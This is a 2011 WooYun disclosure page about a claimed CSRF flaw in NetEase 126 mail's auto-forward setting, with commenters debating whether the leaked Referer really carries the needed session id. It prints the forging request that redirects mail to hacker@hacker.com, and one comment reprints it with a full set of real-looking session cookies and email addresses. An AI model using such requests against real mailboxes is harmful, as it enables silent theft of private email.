当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-02088

漏洞标题:网易邮箱CSRF漏洞

相关厂商:网易

漏洞作者: Joey Yin

提交时间:2011-05-09 16:14

修复时间:2011-05-14 18:00

公开时间:2011-05-14 18:00

漏洞类型:CSRF

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2011-05-09: 细节已通知厂商并且等待厂商处理中
2011-05-14: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

犹豫了很久要不要把这个给爆出来,毕竟影响太大了……

详细说明:

网易邮箱有个很强大的功能叫做“自动转发”,然后这个功能没有做CSRF预防。
看看设置转发的http包吧:
GET /autofw/fwto.do?sid=XXXXXXXXXXXXXXXXXXXXXXXXX&forwarddes=hacker@hacker.com&keeplocal=1&callback=MM.autofwd.valCallback HTTP/1.1
Host: config.mail.126.com
Referer: http://g4a32.mail.126.com/a/j/dm3/index.jsp?sid=XXXXXXXXXXXXXXXXXXXXX
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: *****
看上去貌似要带sid (session id),但是网易的sid是在url里的,换句话说通过http referer就拿到了。接下来可以做的事情就好容易……

漏洞证明:

修复方案:

你懂的。

版权声明:转载请注明来源 Joey Yin@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2011-05-14 18:00

厂商回复:

漏洞Rank:12 (WooYun评价)

最新状态:

暂无

漏洞评价:

评论

  1. 2011-05-09 16:44 | Joey Yin ( 实习白帽子 | Rank:60 漏洞数:5 )

    WooYun: 腾讯邮箱CSRF漏洞 腾讯邮箱的漏洞如出一辙。那边写了详细的攻击手段。供参考。

  2. 2011-05-09 17:03 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    翻到了这个 WooYun: 网易邮箱CSRF漏洞

  3. 2011-05-09 17:08 | Joey Yin ( 实习白帽子 | Rank:60 漏洞数:5 )

    好玩的就在这儿,网易的修复方式不是面对csrf而是加了一个sid作为authentication validation key,殊不知这个sid第三方是可以通过referer拿到的。通过这个方式,我可以结合社工攻击拿到我想要的对象的所有新邮件信息。

  4. 2011-05-09 17:23 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    顶 这个不错 sid这里的保密性做得并不好 :)

  5. 2011-05-11 13:07 | anyunix ( 实习白帽子 | Rank:86 漏洞数:8 | 号被盗。)

    看不到漏洞说的啥,但是,如果你们说的是通过referer获取sid构造CSRF那就错了。referer的sid是加密过了的。而非发邮件需要的sid。这里的漏洞并不存在。

  6. 2011-05-11 13:13 | anyunix ( 实习白帽子 | Rank:86 漏洞数:8 | 号被盗。)

    话说,即使有,一个POST提交的CSRF,值rank20 ???

  7. 2011-05-11 13:30 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    post的exploit也好写 不过需要点连接?

  8. 2011-05-13 12:03 | p.z 认证白帽子 ( 普通白帽子 | Rank:411 漏洞数:40 )

    其实post也可以不需要点连接

  9. 2011-05-13 12:07 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @_@ 请讲,是说所有的都不需要点连接还是说这个问题

  10. 2011-05-14 18:09 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    p.z上更强大的exp吧~

  11. 2011-05-14 21:08 | p.z 认证白帽子 ( 普通白帽子 | Rank:411 漏洞数:40 )

    referer取到的sid不是exp需要的sid,没用....

  12. 2011-05-14 21:13 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    悲剧 怪不得忽略 洞主测试不仔细啊

  13. 2011-05-14 22:37 | sec87 ( 实习白帽子 | Rank:54 漏洞数:7 | 9999999999999999999999999999999999999999...)

    pz意思估计是单从技术上自动POST可以JS简单实现,XSSER意思是网易邮箱米有XSS情况下需要点链接

  14. 2011-05-14 23:48 | p.z 认证白帽子 ( 普通白帽子 | Rank:411 漏洞数:40 )

    不是,我意思是post不单单可以用js去实现,还可以用flash,而且通常对flash的限制比对js的限制要小很多.

  15. 2011-05-16 14:58 | Joey Yin ( 实习白帽子 | Rank:60 漏洞数:5 )

    我是此漏洞作者,关于官方回应,我只能说大家可以自己去看看网易126邮箱设置自动转发的http包。sid确实是一个。GET /autofw/fwto.do?sid=TAvpYxJqRQlNpGCKOkqqdNVBEvKjvnaJ&forwarddes=xxxwooyunorg@gmail.com&keeplocal=1&callback=MM.autofwd.valCallback HTTP/1.1Host: config.mail.126.comReferer: http://g3a19.mail.126.com/a/j/dm3/index.jsp?sid=TAvpYxJqRQlNpGCKOkqqdNVBEvKjvnaJUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24Accept: */*Accept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3Cookie: _ntes_nnid=cb3b2eb6205c14913afb86145fbb1e07,0; ntes_mail_firstpage=normal; logType=df; nts_mail_user=aenjoy:-1:1; NETEASE_SSN=aenjoy; starttime=1305522486235; NTES_SESS=5V4T9lLf.RS9UMeLR6wbW6I1TF4hczFbHg6A2f__mrJFDDJYikaS4yaGmSVoxQcDeslYUp5ys_IckFgmgcudA6Mk3s3HP8Clj1JilkwCiHpIa; S_INFO=1305522500|0|#1&25#|aenjoy@126.com; P_INFO=aenjoy@126.com|1305522500|0|mail126|11&23|sic&1305367732&mail126#sic&510100#10|&0; Coremail=1305522500858%TAvpYxJqRQlNpGCKOkqqdNVBEvKjvnaJ%g3a19.mail.126.com; MAIL_MISC="aenjoy@126.com"; cm_last_info=dT1hZW5qb3klNDAxMjYuY29tJmQ9aHR0cCUzQSUyRiUyRmczYTE5Lm1haWwuMTI2LmNvbSUyRmElMkZqJTJGZG0zJTJGbWFpbi5qc3AlM0ZzaWQlM0RUQXZwWXhKcVJRbE5wR0NLT2txcWROVkJFdktqdm5hSiZzPVRBdnBZeEpxUlFsTnBHQ0tPa3FxZE5WQkV2S2p2bmFKJmg9aHR0cCUzQSUyRiUyRmczYTE5Lm1haWwuMTI2LmNvbSUyRmElMkZqJTJGZG0zJTJGbWFpbi5qc3AlM0ZzaWQlM0RUQXZwWXhKcVJRbE5wR0NLT2txcWROVkJFdktqdm5hSiZ3PWczYTE5Lm1haWwuMTI2LmNvbSZsPS0xJnQ9LTEmdj0w; mail_style=dm3; mail_uid=xxxxwoo111@126.com; mail_host=g3a19.mail.126.com; MAIL126_SSN=xxxxwoo111; cm_newmsg=user%3Dxxxxwoo111%40126.com%26new%3D1413%26total%3D3184

  16. 2011-05-16 17:33 | anyunix ( 实习白帽子 | Rank:86 漏洞数:8 | 号被盗。)

    楼上想说明什么?这里referer没意义。点击时第三方站获取到的referer中参数叫ssid。

  17. 2011-06-24 14:01 | blubit ( 路人 | Rank:0 漏洞数:1 | 大家好,我是blubit)

    厂商忽略。。。。这个回复有点不好让人接受这个漏洞的风险蛮高的。

  18. 2011-07-06 10:00 | sec87 ( 实习白帽子 | Rank:54 漏洞数:7 | 9999999999999999999999999999999999999999...)

    问题:SID是在URL里的,单个邮件里的是SSID,无法获取SID,可通过XSS任意MAIL下XSS获取COOKIE中REG出SID值.调用接口实现希望实现地功能,如那个啥啥啥.

  19. 2011-07-09 19:21 | ˉ黑色.小亮 ( 路人 | Rank:3 漏洞数:2 | 精通系统开机与关机)

    这个CSRF和前段时间的腾讯微薄的好像挺像的.